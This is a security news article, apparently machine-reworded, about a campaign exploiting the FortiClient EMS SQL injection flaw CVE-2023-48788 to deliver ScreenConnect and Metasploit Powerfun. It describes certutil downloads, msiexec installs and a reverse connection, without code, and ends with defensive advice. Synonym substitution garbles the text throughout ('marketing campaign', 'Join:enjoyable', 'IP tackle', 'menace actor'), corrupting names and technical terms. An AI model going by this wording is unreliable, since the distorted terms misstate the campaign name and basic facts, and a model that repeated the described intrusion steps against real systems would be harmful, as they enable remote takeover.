Cybersecurity researchers have found a brand new marketing campaign that is exploiting a not too long ago disclosed security flaw in Fortinet FortiClient EMS units to ship ScreenConnect and Metasploit Powerfun payloads.
The exercise entails the exploitation of CVE-2023-48788 (CVSS rating: 9.3), a essential SQL injection flaw that would allow an unauthenticated attacker to execute unauthorized code or instructions by way of particularly crafted requests.
Cybersecurity agency Forescout is monitoring the marketing campaign beneath the codename Join:enjoyable owing to using ScreenConnect and Powerfun for post-exploitation.
The intrusion focused an unnamed media firm that had its susceptible FortiClient EMS gadget uncovered to the web shortly after the discharge of a proof-of-concept (PoC) exploit for the flaw on March 21, 2024.
Over the following couple of days, the unknown adversary was noticed leveraging the flaw to unsuccessfully obtain ScreenConnect after which set up the distant desktop software program utilizing the msiexec utility.
Nevertheless, on March 25, the PoC exploit was used to launch PowerShell code that downloaded Metasploit’s Powerfun script and initiated a reverse connection to a different IP tackle.
Additionally detected had been SQL statements designed to obtain ScreenConnect from a distant area (“ursketz[.]com”) utilizing certutil, which was then put in by way of msiexec earlier than establishing connections with a command-and-control (C2) server.
There may be proof to recommend that the menace actor behind it has been energetic since not less than 2022, particularly singling out Fortinet home equipment and utilizing Vietnamese and German languages of their infrastructure.
“The noticed exercise clearly has a guide part evidenced by all of the failed makes an attempt to obtain and set up instruments, in addition to the comparatively very long time taken between makes an attempt,” security researcher Sai Molige mentioned.
“That is proof that this exercise is a part of a selected marketing campaign, quite than an exploit included in automated cybercriminal botnets. From our observations, it seems that the actors behind this marketing campaign aren’t mass scanning however selecting goal environments which have VPN home equipment.”
Forescout mentioned the assault shares tactical and infrastructure overlaps with different incidents documented by Palo Alto Networks Unit 42 and Blumira in March 2024 that contain the abuse of CVE-2023-48788 to obtain ScreenConnect and Atera.
Organizations are beneficial to use patches offered by Fortinet to deal with potential threats, monitor for suspicious visitors, and use an online software firewall (WAF) to dam probably malicious requests.
